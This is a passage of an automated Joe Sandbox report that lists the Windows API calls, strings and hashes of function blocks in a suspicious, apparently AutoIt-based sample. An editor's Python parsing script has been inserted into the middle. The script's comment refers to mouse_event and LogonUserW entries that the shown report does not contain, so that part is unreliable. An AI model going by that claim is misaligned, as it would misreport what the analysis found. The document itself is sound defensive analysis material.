                                                                                                                    • Opcode Fuzzy Hash: 9cbfea4c9d486d9b24c1f650519e7f9e684ed805390135369ffddd1643d6eddb
                                                                                                                    • Instruction Fuzzy Hash: 44D05E3226450EAFEF018EA8DC01EBE3B69EB04B01F808111FE15C50A1C775D835AB60
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 002DA12A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 03043a7410e53940a725b58533d84a20d40fb93638d3cd7ec20f3c1c6a6cfb03
                                                                                                                    • Instruction ID: 1296c07643a400fc1a766fef6e994c21e0e39c9232b124cae55da57f41e4ad31
                                                                                                                    • Opcode Fuzzy Hash: 03043a7410e53940a725b58533d84a20d40fb93638d3cd7ec20f3c1c6a6cfb03
                                                                                                                    • Instruction Fuzzy Hash: 86A0123000010CAB8A011B41EC044457F5CD6012A0F404020F40C41021873254104580
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0525651c50c03d6151377e6da7ba1d025736814f6de58aac02680e035b2ce035
                                                                                                                    • Instruction ID: b12b6a2fd16b7c57b23680118afe11a4ce03cfb393e53060b38469a58af43951
                                                                                                                    • Opcode Fuzzy Hash: 0525651c50c03d6151377e6da7ba1d025736814f6de58aac02680e035b2ce035
                                                                                                                    • Instruction Fuzzy Hash: 85224430624517CBDF2A8E28C4A4B7DB7A5FF01304F29C66ED9468B9D2DB709DA1CB41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                    • Instruction ID: 4e3e19bca9b13110ec72f11874b9b3ee3f6a45803d921c290c2fedf87be5dedf
                                                                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                    • Instruction Fuzzy Hash: 44C185322251934ADB6D4A39843453EFAA15EB27B131A075FD8B3DB6D4EF20CD39D620
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                    • Instruction ID: b249df14c53e36a423b5e3518c17bd6ffdb761fbbb86f0bb43498c5b5d4ee35f
                                                                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                    • Instruction Fuzzy Hash: D2C1863222519349DF2D4A39C43413EFAA15EA27B132A076FD4B2DB6D5EF10CD39D660
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                    • Instruction ID: 0e32be9daf88620cc8a5891c26c8758e048869feda8c7f539465a823ce6ae3fc
                                                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                    • Instruction Fuzzy Hash: 1EC1743222519319DF2D4A39C47413EBAA25EA2BB131A075FD4B3CBAD5EF20CD75D620
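Every "APIs" bullet in this section has the same fixed shape: function.module(arguments), ref: call-site address, with the argument list occasionally missing (for example DestroyWindow.USER32 ref: 0032787B). The following Python script is an added example, not part of the Joe Sandbox report: it parses such bullets from a pasted excerpt, groups them per function block, decodes the uMsg argument of SendMessageW and flags calls from a small watchlist. The excerpt is constructed from the mouse_event, LogonUserW and SetUnhandledExceptionFilter entries above and from the window/image sequence later in this section; the watchlist and the one-entry message table are the editor's own choices, not the report's signature set.

```python
import re
from dataclasses import dataclass

# Constructed excerpt: the "APIs" bullets of four function blocks, copied in the
# shape this report section prints them (FUNC.MODULE(args), ref: ADDR).
REPORT_EXCERPT = """\
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00314C4A
Memory Dump Source
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00308389), ref: 003087D1
Memory Dump Source
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 002DA12A
Memory Dump Source
APIs
• DestroyWindow.USER32 ref: 0032787B
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327A35
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327A9D
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327AD3
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00342CAC,00000000), ref: 00327B16
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00327B6B
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327D7A
Strings
"""

@dataclass
class ApiCall:
    function: str
    module: str
    args: list
    ref: str          # address of the call site inside the dumped image

# One bullet. The argument list and the comma before "ref:" are optional because
# the report also prints bare calls such as "DestroyWindow.USER32 ref: 0032787B".
API_LINE = re.compile(
    r"^\s*•?\s*(?P<func>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

def parse_api_calls(text):
    """Return one list of ApiCall per 'APIs' block; any non-bullet line closes a block."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = API_LINE.match(line)
        if m is not None and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append(ApiCall(m["func"], m["mod"], args, m["ref"].upper()))
        elif line.strip():
            current = None
    return blocks

# Minimal uMsg table (editor's choice): 0x0172 is STM_SETIMAGE, the message that
# assigns a bitmap or icon to a static control.
WINDOW_MESSAGES = {0x0172: "STM_SETIMAGE"}

def decode_sendmessage(call):
    """For SendMessageW/A, map the second argument (uMsg, printed in hex) to its name."""
    if call.function not in ("SendMessageW", "SendMessageA") or len(call.args) < 2:
        return None
    try:
        return WINDOW_MESSAGES.get(int(call.args[1], 16))
    except ValueError:       # the analyser printed "?" for an unresolved argument
        return None

# Watchlist (editor's choice, not part of the report's signature set).
WATCHLIST = {
    "LogonUserW": "validates a user name/password pair and returns a logon token",
    "mouse_event": "synthesises mouse input",
    "SetUnhandledExceptionFilter": "installs a top-level exception filter "
                                   "(normal in CRT start-up, also a known anti-debugging trick)",
    "OleLoadPicture": "decodes an in-memory image via OLE",
}

def flag_calls(blocks):
    """Return (ref, function, note) for watchlisted APIs and decoded SendMessage constants."""
    hits = []
    for block in blocks:
        for call in block:
            if call.function in WATCHLIST:
                hits.append((call.ref, call.function, WATCHLIST[call.function]))
            msg = decode_sendmessage(call)
            if msg:
                hits.append((call.ref, call.function,
                             f"uMsg 0x{int(call.args[1], 16):04X} = {msg}"))
    return hits

if __name__ == "__main__":
    parsed = parse_api_calls(REPORT_EXCERPT)
    for i, block in enumerate(parsed):
        print(f"function block {i}: {[c.function for c in block]}")
    for ref, func, note in flag_calls(parsed):
        print(f"{ref}  {func:<28} {note}")
```

Paste a larger slice of the report into REPORT_EXCERPT (or read it from a file) to get a per-function API inventory; the call-site addresses in the third column line up with the ref values in the report, so a hit can be located in the memory dump named in the block's "Source File" line.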
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0032785B
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0032786D
                                                                                                                    • DestroyWindow.USER32 ref: 0032787B
                                                                                                                    • GetDesktopWindow.USER32 ref: 00327895
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0032789C
                                                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003279DD
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003279ED
                                                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327A35
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00327A41
                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00327A7B
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327A9D
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327AB0
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327ABB
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00327AC4
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327AD3
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00327ADC
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327AE3
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00327AEE
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327B00
                                                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00342CAC,00000000), ref: 00327B16
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00327B26
                                                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00327B4C
                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00327B6B
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327B8D
                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327D7A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                    • Opcode ID: 3b32a5759970379beabfc474944fd2823228e4d7d6602dda67b303bb04e19434
                                                                                                                    • Instruction ID: 4820b5e45e2f02cb4e78e213bf59d4baa87a001b83449700074cfff72dbb558d
                                                                                                                    • Opcode Fuzzy Hash: 3b32a5759970379beabfc474944fd2823228e4d7d6602dda67b303bb04e19434
                                                                                                                    • Instruction Fuzzy Hash: 71026A71910215EFDB16DFA8EC89EAE7BB9FF48310F508158F915AB2A1C770AD41CB60
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,0033F910), ref: 00333627
                                                                                                                    • IsWindowVisible.USER32(?), ref: 0033364B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                    • API String ID: 4105515805-45149045
                                                                                                                    • Opcode ID: efa7dcb01bb4eca1b386934548603f4a78d686e221f73efe355a0939f63f7285
                                                                                                                    • Instruction ID: c7abc9458f43a0caf0e2a7854b274f7f1c2d5efb9b792ac4a8e194dfc76b4705
                                                                                                                    • Opcode Fuzzy Hash: efa7dcb01bb4eca1b386934548603f4a78d686e221f73efe355a0939f63f7285
                                                                                                                    • Instruction Fuzzy Hash: D0D1A1342183019FCB06EF10C4D2BAE77A9AF95394F058459F9825B7E2CB31EE5ACB41
                                                                                                                    APIs
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0033A630
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0033A661
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0033A66D
                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0033A687
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0033A696
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0033A6C1
                                                                                                                    • GetSysColor.USER32(00000010), ref: 0033A6C9
                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0033A6D0
                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0033A6DF
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0033A6E6
                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0033A731
                                                                                                                    • FillRect.USER32(?,?,00000000), ref: 0033A763
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0033A78E
                                                                                                                      • Part of subcall function 0033A8CA: GetSysColor.USER32(00000012), ref: 0033A903
                                                                                                                      • Part of subcall function 0033A8CA: SetTextColor.GDI32(?,?), ref: 0033A907
                                                                                                                      • Part of subcall function 0033A8CA: GetSysColorBrush.USER32(0000000F), ref: 0033A91D
                                                                                                                      • Part of subcall function 0033A8CA: GetSysColor.USER32(0000000F), ref: 0033A928
                                                                                                                      • Part of subcall function 0033A8CA: GetSysColor.USER32(00000011), ref: 0033A945
                                                                                                                      • Part of subcall function 0033A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0033A953
                                                                                                                      • Part of subcall function 0033A8CA: SelectObject.GDI32(?,00000000), ref: 0033A964
                                                                                                                      • Part of subcall function 0033A8CA: SetBkColor.GDI32(?,00000000), ref: 0033A96D
                                                                                                                      • Part of subcall function 0033A8CA: SelectObject.GDI32(?,?), ref: 0033A97A
                                                                                                                      • Part of subcall function 0033A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0033A999
                                                                                                                      • Part of subcall function 0033A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0033A9B0
                                                                                                                      • Part of subcall function 0033A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0033A9C5
                                                                                                                      • Part of subcall function 0033A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0033A9ED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3521893082-0
                                                                                                                    • Opcode ID: 7d0894e2b6084ab0b07ae7591a1da2aba91b786ddb0c9941c6e71397457c43bc
                                                                                                                    • Instruction ID: 16edd0fcd4ce6584c37255f21f87258863aef322227246ded3a0e2d73c1e0864
                                                                                                                    • Opcode Fuzzy Hash: 7d0894e2b6084ab0b07ae7591a1da2aba91b786ddb0c9941c6e71397457c43bc
                                                                                                                    • Instruction Fuzzy Hash: B2917B72808701FFD7129F64DC88A5BBBADFF89321F500B29F9A2961A0D771D944CB52
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,?,?), ref: 002B2CA2
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002B2CE8
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002B2CF3
                                                                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 002B2CFE
                                                                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 002B2D09
                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 002EC43B
                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 002EC474
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002EC89D
                                                                                                                      • Part of subcall function 002B1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002B2036,?,00000000,?,?,?,?,002B16CB,00000000,?), ref: 002B1B9A
                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 002EC8DA
                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002EC8F1
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 002EC907
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 002EC912
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 464785882-4108050209
                                                                                                                    • Opcode ID: c72178c61b0725262d65f6b98bd07c02c212a7885bb102876f280b15463ded5f
                                                                                                                    • Instruction ID: e10b30bca5ad7525c034ebaec18eccea32d49e7866f922b659910cf8d9669599
                                                                                                                    • Opcode Fuzzy Hash: c72178c61b0725262d65f6b98bd07c02c212a7885bb102876f280b15463ded5f
                                                                                                                    • Instruction Fuzzy Hash: EA12BD30660242EFDB15CF25C884BA9BBE5FF45340FA4456AF895DB262C731E866CF90
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 003274DE
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0032759D
                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003275DB
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003275ED
                                                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00327633
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0032763F
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00327683
                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00327692
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 003276A2
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 003276A6
                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003276B6
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003276BF
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 003276C8
                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003276F4
                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0032770B
                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00327746
                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0032775A
                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0032776B
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0032779B
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 003277A6
                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003277B1
                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003277BB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                    • Opcode ID: fca24822a71fce80bc5c5d5159b01c214a9989a847982036ed78a6de6a316068
                                                                                                                    • Instruction ID: 9682c3bd4f4818fc2a8140b20d69da9e1c9aac810f2400ff67b9a97cebe3beb2
                                                                                                                    • Opcode Fuzzy Hash: fca24822a71fce80bc5c5d5159b01c214a9989a847982036ed78a6de6a316068
                                                                                                                    • Instruction Fuzzy Hash: 04A184B1A10615BFEB15DBA4DC8AFAEBB7DEB05710F108114FA14A72E1C7B0AD40CB60
